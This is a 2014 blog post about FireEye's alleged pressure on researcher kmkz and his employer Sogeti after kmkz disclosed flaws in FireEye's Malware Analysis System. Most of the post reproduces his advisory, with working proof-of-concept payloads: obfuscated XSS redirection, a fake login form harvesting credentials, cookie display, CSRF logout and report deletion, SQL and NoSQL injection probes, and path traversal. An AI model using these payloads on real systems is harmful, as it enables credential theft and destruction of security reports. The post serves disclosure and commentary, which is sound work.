Wednesday, July 9, 2014

A Story of a Bully: FireEye,Sogeti vs kmkz,security researchers

So I really hate it when big companies think like they are the boss and can do whatever the hell they want ... most of the times they actually get things going the way they wish ... but not always ..
And recently something interesting happened that caught my Eye ..

A security researcher  kmkz_security  found Multiple Vulnerabilities in FireEye Malware Analysis System (MAS) 6.4.1 and like any other good security researcher he contacted FireEye in May and later made ​​his full black-box audit public at exploit-db.com.
So you must be thinking...everyone should be happy.. FireEye should fix the issues and praise kmkz for the work he did in his free time right?
Well not quite.. FireEye always posts about vulnerabilities in softwares of other companies, exploits and their pentesting work.. They claim to protect you against undisclosed 0day vulnerabilities and all sorts of Cyber threat.. bla bla bla.. and when you claim that their program has vulnerabilities... Well.. They were pissed.

 FireEye Malware Analysis System (MAS) 6.4.1 - Multiple Vulnerabilities  
   
 *************************************************************  
 *[Audit Type] web IHM ONLY / Full black-box audit           *
 *[Multiples Vulnerabilities]                                *    
 *  3 XSS (reflected)                                        *  
 *  1 CSRF                                                   *  
 *  1 NoSQLi (Json object)                                   *  
 *  1 PostGreSQL SQLi (Exploitable?)                         *  
 *  1 File and Path Disclosure                               *  
 *  1 Source code Info-leak                                  *  
 *                                                           *  
 *************************************************************  
    
 [*] XSS:  
   +First XSS (reflected):  
     https://192.168.1.50/yara/show_ya_file?name=<body onload=alert('XSSED')>  
   PoC :  
     Redirection:  
       https://192.168.1.50/yara/show_ya_file?name=<body  
 onload=document.location=(String.fromCharCode(104,116,116,112,58,47,47,103,111,111,103,108,101,46,99,111,109))>  
     Url encoded redirection payload:  
       https://192.168.1.50/yara/show_ya_file?name=%3Cbody%20onload%3Ddocument.location%3D(String.fromCharCode(104%2C116%2C116%2C112%2C58%2C47%2C47%2C103%2C111%2C111%2C103%2C108%2C101%2C46%2C99%2C111%2C109))%3E%0A%09  
    
     Phishing page PoC:  
       https://192.168.1.50/yara/show_ya_file?name=<body  
 onload=document.write(String.fromCharCode(60,104,116,109,108,62,60,98,111,100,121,62,60,104,101,97,100,62,60,109,101,116,97,32,99,111,110,116,101,110,116,61,34,116,101,120,116,47,104,116,109,108,59,32,99,104,97,114,115,101,116,61,117,116,102,45,56,34,62,60,47,109,101,116,97,62,60,47,104,101,97,100,62,60,100,105,118,32,115,116,121,108,101,61,34,116,101,120,116,45,97,108,105,103,110,58,32,99,101,110,116,101,114,59,34,62,60,102,111,114,109,32,77,101,116,104,111,100,61,34,80,79,83,84,34,32,65,99,116,105,111,110,61,34,104,116,116,112,115,58,47,47,119,119,119,46,103,111,111,103,108,101,46,114,117,34,62,80,104,105,115,104,105,110,103,112,97,103,101,32,58,60,98,114,32,47,62,60,98,114,47,62,85,115,101,114,110,97,109,101,32,58,60,98,114,32,47,62,32,60,105,110,112,117,116,32,110,97,109,101,61,34,85,115,101,114,34,32,47,62,60,98,114,32,47,62,80,97,115,115,119,111,114,100,32,58,60,98,114,32,47,62,60,105,110,112,117,116,32,110,97,109,101,61,34,80,97,115,115,119,111,114,100,34,32,116,121,112,101,61,34,112,97,115,115,119,111,114,100,34,32,47,62,60,98,114,32,47,62,60,98,114,32,47,62,60,105,110,112,117,116,32,110,97,109,101,61,34,86,97,108,105,100,34,32,118,97,108,117,101,61,34,79,107,32,33,34,116,121,112,101,61,34,115,117,98,109,105,116,34,32,47,62,32,60,98,114,32,47,62,60,47,102,111,114,109,62,60,47,100,105,118,62,60,47,98,111,100,121,62,60,47,104,116,109,108,62))>  
     Url encoded phishing page payload:  
       https://192.168.1.50/yara/show_ya_file?name=%3Cbody%20onload%3Ddocument.write(String.fromCharCode(60%2C104%2C116%2C109%2C108%2C62%2C60%2C98%2C111%2C100%2C121%2C62%2C60%2C104%2C101%2C97%2C100%2C62%2C60%2C109%2C101%2C116%2C97%2C32%2C99%2C111%2C110%2C116%2C101%2C110%2C116%2C61%2C34%2C116%2C101%2C120%2C116%2C47%2C104%2C116%2C109%2C108%2C59%2C32%2C99%2C104%2C97%2C114%2C115%2C101%2C116%2C61%2C117%2C116%2C102%2C45%2C56%2C34%2C62%2C60%2C47%2C109%2C101%2C116%2C97%2C62%2C60%2C47%2C104%2C101%2C97%2C100%2C62%2C60%2C100%2C105%2C118%2C32%2C115%2C116%2C121%2C108%2C101%2C61%2C34%2C116%2C101%2C120%2C116%2C45%2C97%2C108%2C105%2C103%2C110%2C58%2C32%2C99%2C101%2C110%2C116%2C101%2C114%2C59%2C34%2C62%2C60%2C102%2C111%2C114%2C109%2C32%2C77%2C101%2C116%2C104%2C111%2C100%2C61%2C34%2C80%2C79%2C83%2C84%2C34%2C32%2C65%2C99%2C116%2C105%2C111%2C110%2C61%2C34%2C104%2C116%2C116%2C112%2C115%2C58%2C47%2C47%2C119%2C119%2C119%2C46%2C103%2C111%2C111%2C103%2C108%2C101%2C46%2C114%2C117%2C34%2C62%2C80%2C104%2C105%2C115%2C104%2C105%2C110%2C103%2C112%2C97%2C103%2C101%2C32%2C58%2C60%2C98%2C114%2C32%2C47%2C62%2C60%2C98%2C114%2C47%2C62%2C85%2C115%2C101%2C114%2C110%2C97%2C109%2C101%2C32%2C58%2C60%2C98%2C114%2C32%2C47%2C62%2C32%2C60%2C105%2C110%2C112%2C117%2C116%2C32%2C110%2C97%2C109%2C101%2C61%2C34%2C85%2C115%2C101%2C114%2C34%2C32%2C47%2C62%2C60%2C98%2C114%2C32%2C47%2C62%2C80%2C97%2C115%2C115%2C119%2C111%2C114%2C100%2C32%2C58%2C60%2C98%2C114%2C32%2C47%2C62%2C60%2C105%2C110%2C112%2C117%2C116%2C32%2C110%2C97%2C109%2C101%2C61%2C34%2C80%2C97%2C115%2C115%2C119%2C111%2C114%2C100%2C34%2C32%2C116%2C121%2C112%2C101%2C61%2C34%2C112%2C97%2C115%2C115%2C119%2C111%2C114%2C100%2C34%2C32%2C47%2C62%2C60%2C98%2C114%2C32%2C47%2C62%2C60%2C98%2C114%2C32%2C47%2C62%2C60%2C105%2C110%2C112%2C117%2C116%2C32%2C110%2C97%2C109%2C101%2C61%2C34%2C86%2C97%2C108%2C105%2C100%2C34%2C32%2C118%2C97%2C108%2C117%2C101%2C61%2C34%2C79%2C107%2C32%2C33%2C34%2C116%2C121%2C112%2C101%2C61%2C34%2C115%2C117%2C98%2C109%2C105%2C116%2C34%2C32%2C47%2C62%2C32%2C60%2C98%2C114%2C32%2C47%2C62%2C60%2C47%2C102%2C111%2C114%2C109%2C62%2C60%2C47%2C100%2C105%2C118%2C62%2C60%2C47%2C98%2C111%2C100%2C121%2C62%2C60%2C47%2C104%2C116%2C109%2C108%2C62))%3E  
   +Second XSS (reflected):  
     https://192.168.1.50/network/network?new_domain=%3Cscript%3Ealert%28%27XSSED%27%29%3C%2Fscript%3E  
   +Third XSS (reflected):  
     https://192.168.1.50/manual/csc?mode=%3C/script%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E  
 Show Cookie PoC:  
       https://192.168.1.50/manual/csc?mode=%3C/script%3E%3Ccenter%3E%3Cscript%3Edocument.write%28%22%22%29%3C/script%3E%3Cb%3EUser%20Informations:%3C/b%3E%3Cbr/%3E%3Cscript%3Edocument.write%28document.cookie%29%3C/script%3E%3C/center%3E%3Cpwn  
    
 [*] CSRF:  
    
   PoC:  
     admin logout:  
       https://192.168.1.50/network/network?new_domain=<script>document.location="https://192.168.1.50/login/logout?notice=Deconnection+kmkz+CSRF+PoC"</script>  
     Url encoded admin deconnexion PoC:  
       https://192.168.1.50/network/network?new_domain=%3Cscript%3Edocument.location%3D%22https%3A%2F%2F192.168.1.50%2Flogin%2Flogout%3Fnotice%3DDeconnection%2Bkmkz%2BCSRF%2BPoC%22%3C%2Fscript%3E  
     Report deleting:  
       https://192.168.1.50/network/network?new_domain=<script>document.location="https://192.168.1.50/report/delete_pdf/?id=Alert_Details_fireye-2F_20140502_120000.xml"</script>  
     Url encoded report deleting Poc:  
       https://192.168.1.50/network/network?new_domain=%3Cscript%3Edocument.location%3D%22https%3A%2F%2F192.168.1.50%2Freport%2Fdelete_pdf%2F%3Fid%3DAlert_Details_fireye-2F_20140502_120000.xml%22%3C%2Fscript%3E  
 [*] SQLi PostGreSQL (Exploitable?):  
   https://192.168.1.50/event_stream/send_pcap_file?ev_id=9999 OR SELECT 1,2  
 FROM events /**  
    
   output:  
     Event ID '9999 OR SELECT 1,2 FROM events ' could not be retrieved.  
 Couldn't find Event with id=9999 OR SELECT 1,2 FROM events  
   https://192.168.1.50/event_stream/send_pcap_file?ev_id=99999999999  Output:  
     Event ID '99999999999' could not be retrieved.  
     PG::Error: ERROR: value "99999999999" is out of range for type  
 integer : SELECT "events".* FROM "events" WHERE "events"."id" = $1 LIMIT 1  
    
    
 [*] Files & Directory Disclosure:  
   https://192.168.1.50/malware_analysis/ma_repo : the Input Path field  
 allow Path & file disclosure ../../../../../../../bin/sh (example)  
    
    
 {*] Others:  
   1)No SQLi (Json)  
 https://192.168.1.50/network/network?new_domain[$ne]=blah  
   Return: {"$ne"=>"blah"} is not a valid host // Exploitable?  
   2)Source code Info-leak:  
     https://192.168.1.50/manual/csc?mode=%3C/script%3E


So they next contacted Sogeti the company kmkz worked for and also kmkz...
They made him take down the disclosure from exploit-db.com. Then FireEye's System Engineering Manager, on July 7, asked Bourbon a.k.a kmkz to initiate the process of having Google's cache of the disclosure expunged, while confirming that the actual post on Exploit-DB was in fact removed.

And even after all this FireEye was not satisfied...

They requested Sogeti to fire kmkz..
At this point.. most of the people who were following this incident had enough of this nonsense..
And gave some great reactions..


And many others reacted to this and by now Sogeti started feeling the heat..
They tweeted:

Pretty Soon.... maybe its just a coincidence but...
33.46  -3.15 (-8.60%)
Quote as of 

FireEye's stocks also took a plunge...
And then came the best response...
All I can say is.. a honest hard working and efficient security researcher will easily get hired by a good company...
FireEye should learn a lesson from this..


Posted by at
Labels: , , , , , , , , , , ,

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)